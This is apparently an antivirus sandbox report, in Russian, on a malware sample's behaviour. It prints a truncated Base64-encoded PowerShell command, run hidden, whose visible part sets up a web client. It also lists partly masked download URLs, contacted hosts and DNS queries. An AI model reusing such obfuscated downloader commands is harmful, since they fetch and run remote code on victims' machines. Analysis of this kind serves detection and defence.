Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABYAFUAawBBAEEAVQA9ACgAJwB6AEEARwBBACcAKwAnAFgAVQAnACkAOwAkAGsAWgAxAEEAQQBCAEEANAA9ACYAKAAnAG4AZQAnACsAJwB3AC0AbwBiAGoAJwArACcAZQBjAHQAJwApACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQARwBjAE...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1552
- %TEMP%\1062351.cvr
- 'os##sa.com':80
- 'ne####eholding.com':80
- 'hu###omains.com':443
- http://os##sa.com/wp-includes/30H/
- http://ne####eholding.com/xwhbob7/0uOb/
- 'hu###omains.com':443
- DNS ASK ne###nil.com
- DNS ASK cr#####erscrubbers.com
- DNS ASK my#####enliathuduc.com
- DNS ASK os##sa.com
- DNS ASK ne####eholding.com
- DNS ASK hu###omains.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABYAFUAawBBAEEAVQA9ACgAJwB6AEEARwBBACcAKwAnAFgAVQAnACkAOwAkAGsAWgAxAEEAQQBCAEEANAA9ACYAKAAnAG4AZQAnACsAJwB3AC0AbwBiAGoAJwArACcAZQBjAHQAJwApACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQARwBjAE...' (со скрытым окном)